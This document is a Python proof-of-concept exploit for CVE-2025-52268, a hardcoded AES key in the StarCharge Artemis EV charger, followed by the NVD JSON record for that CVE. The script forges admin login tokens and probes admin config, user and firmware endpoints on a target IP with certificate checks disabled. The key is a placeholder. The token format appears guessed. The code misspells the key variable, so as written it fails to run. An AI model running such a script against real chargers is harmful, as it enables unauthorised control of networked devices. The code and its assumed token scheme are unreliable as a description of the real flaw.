CVE-2025-52268

#!/usr/bin/env python3 """ CVE-2025-52268 PoC - StarCharge Artemis AC Charger Hardcoded AES Key Exploitation This PoC demonstrates how to forge login tokens using the hardcoded AES key. Note: The actual AES key should be extracted from the firmware. """ import base64 import json from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad import requests # Hardcoded AES key extracted from firmware (placeholder - extract from actual firmware) HARDCODED_AES_KEY = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f" def forge_login_token(username, role="admin"): """Forge a login token using the hardcoded AES key""" payload = { "username": username, "role": role, "exp": 1893456000 # Long expiration } payload_json = json.dumps(payload) padded_data = pad(payload_json.encode(), AES.block_size) cipher = AES.new(HARCODED_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16) encrypted = cipher.encrypt(padded_data) token = base64.b64encode(encrypted).decode() return token def exploit(target_ip, username="attacker"): """Exploit the hardcoded key vulnerability""" forged_token = forge_login_token(username, "admin") headers = { "Authorization": f"Bearer {forged_token}", "Content-Type": "application/json" } # Attempt to access admin endpoints endpoints = [ f"https://{target_ip}/api/admin/config", f"https://{target_ip}/api/admin/users", f"https://{target_ip}/api/admin/firmware" ] for endpoint in endpoints: try: response = requests.get(endpoint, headers=headers, verify=False, timeout=10) print(f"[*] {endpoint} - Status: {response.status_code}") if response.status_code == 200: print(f"[!] Successfully authenticated to {endpoint}") print(f"[+] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Failed to connect to {endpoint}: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) print("[*] CVE-2025-52268 - StarCharge Artemis Hardcoded AES Key Exploit") exploit(sys.argv[1])

{"cve": {"id": "CVE-2025-52268", "sourceIdentifier": "[email protected]", "published": "2025-10-27T15:15:38.750", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "StarCharge Artemis AC Charger 7-22 kW v1.0.4 was discovered to contain a hardcoded AES key which allows attackers to forge or decrypt valid login tokens."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/HaToan/CVEs/blob/main/starcharge/README.md", "source": "[email protected]"}, {"url": "https://www.starcharge.com/product/artemis/", "source": "[email protected]"}]}}